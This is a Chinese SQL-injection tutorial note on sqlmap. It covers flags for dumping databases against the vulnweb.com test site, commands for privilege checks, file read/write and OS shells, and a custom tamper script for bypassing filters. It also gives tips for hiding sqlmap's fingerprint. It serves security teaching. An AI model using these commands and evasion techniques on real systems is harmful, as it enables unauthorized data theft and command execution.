sql注入五-WEB攻防-注入工具&SQLMAP&Tamper编写&指纹修改&高权限操作&目录架构


演示案例:

  • 数据猜解-库表列数据&字典
  • 权限操作-文件&命令&交互式
  • 提交方法-POST&HEAD&JSON
  • 绕过模块-Tamper脚本-使用&开发
  • 分析拓展-代理&调试&指纹&风险&等级
复制代码
#参考:`
`https://www.cnblogs.com/bmjoker/p/9326258.html`

`#数据猜解-库表列数据&字典`
`测试:http://vulnweb.com/`
`--current-db`
`--tables -D ""`
`--columns -T ""` `-D ""`
`--dump -C ""` `-C ""` `-T ""`

`#权限操作-文件&命令&交互式`
`测试:MYSQL高权限注入`
`引出权限:`
`--is-dba --privileges`
`引出文件:`
`--file-read --file-write --file-dest `
`引出命令:`
`--os-cmd=` `--os-shell --sql-shell`

`#提交方法-POST&HEAD&JSON`
`测试:Post Cookie Json`
`--data ""`
`--cookie ""`
`-r 1.txt`

`#绕过模块-Tamper脚本-使用&开发`
`测试:base64注入 有过滤的注入`
`--tamper=base64encode.py`
`--tamper=test.py`
`from lib.core.enums import PRIORITY`

`__priority__ = PRIORITY.LOW`

`def` `dependencies():`
    `pass`

`def` `tamper(payload,` `**kwargs):`
    `if payload:`      
`        payload = payload.replace('SELECT','sElEct')`
`        payload = payload.replace('OR','Or')`
`        payload = payload.replace('AND','And')`
`        payload = payload.replace('SLEEP','SleeP')`
`        payload = payload.replace('ELT','Elt')`
    `return payload`


`#分析拓展-代理&调试&指纹&风险&等级`
`1、后期分析调试:`
`-v=(0-6)`  `#详细的等级(0-6)`
`--proxy "http://xx:xx"` `#代理注入`

`2、打乱默认指纹:`
`--user-agent ""`  `#自定义user-agent`
`--random-agent   #随机user-agent`
`--time-sec=(2,5)` `#延迟响应,默认为5`

`3、使用更多的测试:测试Header注入`
`--level=(1-5)` `#要执行的测试水平等级,默认为1 `
`--risk=(0-3)`  `#测试执行的风险等级,默认为1 `
`

涉及资源:

补充:涉及录像课件资源软件包资料等下载地址

相关推荐
Bruce_Liuxiaowei8 小时前
[特殊字符] C&C服务器:网络攻击的指挥中心
运维·服务器·网络安全
-曾牛18 小时前
深入浅出 SQL 注入
网络·sql·安全·网络安全·渗透测试·sql注入·盲注
汤愈韬19 小时前
IIS服务器
windows·网络安全
-曾牛19 小时前
从零到一:XSS靶场 haozi.me 全关卡通关教程(含冷知识汇总)
前端·网络安全·渗透测试·靶场·xss·攻略·靶场教程
挨踢攻城1 天前
网络安全 | 如何防御勒索软件?
安全·web安全·网络安全·php·厦门微思网络·防疫勒索软件
belldeep1 天前
网络安全:Apache Druid 安全漏洞
网络安全·apache·druid
Whoami!1 天前
6-1〔O҉S҉C҉P҉ ◈ 研记〕❘ 客户端攻击▸侦查客户端指纹
网络安全·信息安全·客户端侦查
Whoami!1 天前
6-2〔O҉S҉C҉P҉ ◈ 研记〕❘ 客户端攻击▸利用WORD宏让客户端执行命令
网络安全·信息安全·oscp·宏文件攻击
Whoami!1 天前
⸢ 玖 ⸥⤳ 威胁感知与响应体系概念及建设思路
网络安全·信息安全·态势感知·威胁响应
网络安全-海哥1 天前
Web安全深度实战:从漏洞原理到防护方案
sql·web安全·网络安全·xss·csrf·漏洞挖掘·安全防护